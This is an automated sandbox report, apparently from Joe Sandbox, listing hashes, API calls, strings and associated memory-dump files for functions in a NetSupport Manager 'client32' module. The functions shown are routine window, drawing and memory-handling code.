Opcode Fuzzy Hash: 26a32833975e99b8172e0f8059736a3867dcaecb9c6cc9a2dc8fb3f4eff27dcb
Instruction Fuzzy Hash: 2B219F79200206AFD714DF55DC85F9BBBE9AF88318F10821DF95A97281DB70E941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 110183B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 110183BF
GetSystemMetrics.USER32 ref: 110183DF
FindWindowA.USER32 ref: 11018429

Strings

IPTip_Main_Window, xrefs: 11018424

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$FindWindow
String ID: IPTip_Main_Window
API String ID: 3964754823-293399287
Opcode ID: 338d81376081f096a8910d24601292b11f0403676c3425d7a8f136870903a89b
Instruction ID: 48eceb47ebeb3c7c94f5e0ea21fac0982c3091e714c0091f6a40e808b7a20a73
Opcode Fuzzy Hash: 338d81376081f096a8910d24601292b11f0403676c3425d7a8f136870903a89b
Instruction Fuzzy Hash: 1411E53AD80229A7DF01DAE05E41BDE77AC5B00249F0045EBED05AB048EE69D70586E1

Uniqueness

Uniqueness Score: -1.00%

Function 11153570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 111535AC
_memmove.LIBCMT ref: 111535E6

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\ctl32\WCUNPACK.C, xrefs: 111535C1
n > 128, xrefs: 111535C6

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$ErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\WCUNPACK.C$n > 128
API String ID: 6605023-1396654219
Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 11014310 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32 ref: 1101434C

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11014360
SysHeader32, xrefs: 11014346
..\ctl32\headctrl.cpp, xrefs: 1101435B

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateErrorExitLastMessageProcessWindowwsprintf
String ID: ..\ctl32\headctrl.cpp$SysHeader32$m_hWnd
API String ID: 2789554107-4050302278
Opcode ID: 1c3010da04db5bed3b6cedd171569ece4558817593313ce3a80e1c51835089e3
Instruction ID: 47ca1da31ef5e317866de86f9591e30fe02a5225a1dd4fd0741b7edf9cd601c6
Opcode Fuzzy Hash: 1c3010da04db5bed3b6cedd171569ece4558817593313ce3a80e1c51835089e3
Instruction Fuzzy Hash: 4C014B7621021ABBCB54DE99DC85EDBB7ADAF88608F008159F919A7240D630E850CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 11015400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11015413, 110AB003
..\ctl32\liststat.cpp, xrefs: 1101540E
..\ctl32\listview.cpp, xrefs: 110AAFFE

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
API String ID: 819365019-2727927828
Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 11081680 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 110816D7

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\DataStream.cpp, xrefs: 11081694
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 110816BB
IsA(), xrefs: 11081699, 110816C0

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_freewsprintf
String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 2441568934-1875806619
Opcode ID: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
Opcode Fuzzy Hash: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2

Uniqueness

Uniqueness Score: -1.00%

Function 1101D3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 1101D3EB
EnableWindow.USER32(00000000,?), ref: 1101D3F6

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 1101D3D6
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D3D1

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1136984157-1986719024
Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4

Uniqueness

Uniqueness Score: -1.00%

Function 1101D410 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 1101D43F
ShowWindow.USER32(00000000), ref: 1101D446

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 1101D426
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D421

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1319256379-1986719024
Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0

Uniqueness

Uniqueness Score: -1.00%

Function 110684E0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,0CBC1010,00000000,00002710,00000001,11027140,0CBC1010,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A
LeaveCriticalSection.KERNEL32(?), ref: 11068650

Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008

Strings

EnumConn error, idata=%x, xrefs: 110686C6

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$DecrementEnterInterlockedLeave
String ID: EnumConn error, idata=%x
API String ID: 1807080765-705201588
Opcode ID: 034cf08e4a73f3bbcf5382d7acf9542c2045b6419cadcfded54175309a3fc030
Instruction ID: f50a52aadb97ad3236bd0d1f883a893e57f1c03978fbfaa17d5cd730c2e6c701
Opcode Fuzzy Hash: 034cf08e4a73f3bbcf5382d7acf9542c2045b6419cadcfded54175309a3fc030
Instruction Fuzzy Hash: DD519FB5E007468FE725CF54C580BAAF7F9FF48318F104AAEE85687A91D731A941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 11165643 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 111656DE
__flush.LIBCMT ref: 111656FC
__write.LIBCMT ref: 11165723
__flsbuf.LIBCMT ref: 1116574E

Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
Opcode Fuzzy Hash: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40

Uniqueness

Uniqueness Score: -1.00%

Function 11008359 Relevance: 6.1, APIs: 4, Instructions: 68windowCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 110083F3
SelectObject.GDI32(?,?), ref: 11008415
DeleteDC.GDI32(?), ref: 11008422
DeleteObject.GDI32(?), ref: 1100842F
GetDC.USER32(00000000), ref: 1100845D
CreateCompatibleDC.GDI32(00000000), ref: 1100846A
CreateCompatibleBitmap.GDI32(?,00000004,00000010), ref: 11008481
SelectObject.GDI32(?,00000000), ref: 11008495
_malloc.LIBCMT ref: 110084F5

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreateDeleteSelect$Bitmap_free_malloc
String ID:
API String ID: 4288422576-0
Opcode ID: 91c89b74b91c336bb3830d7201085ffe0f6e2ebe70c7ebf5e74ffc9f1e31602d
Instruction ID: 71ddcf67a8684a935c6e16c4ea2a73cd506f955dbb6c56238cfab8e0aaa932bb
Opcode Fuzzy Hash: 91c89b74b91c336bb3830d7201085ffe0f6e2ebe70c7ebf5e74ffc9f1e31602d
Instruction Fuzzy Hash: 8421FF79610A019FD364DF28C994AE7B3E9FBC8318F10891DE56A97311CB31F842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 11160450 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

SetPropA.USER32 ref: 1116046E
SetWindowLongA.USER32 ref: 1116047F

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LongPropWindow
String ID:
API String ID: 2492497586-0
Opcode ID: c21c60cc47c8b8f98d029afb4ec14b55cd060e124069d68dfb3cc30e1ab93e6f
Instruction ID: 1c745b1653fd3e8b3091c37bbb53d0f4b243916ecd5e1758ad18f1d63e851998
Opcode Fuzzy Hash: c21c60cc47c8b8f98d029afb4ec14b55cd060e124069d68dfb3cc30e1ab93e6f
Instruction Fuzzy Hash: 24018C762003259BD3308F5AE844FA7FBFCEB91335F00862AF57582A80C3B9A451DB60

Uniqueness

Uniqueness Score: -1.00%

Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?,?), ref: 11143091
SetRect.USER32 ref: 111430A9
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
SetBkColor.GDI32(?,00000000), ref: 111430C8

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
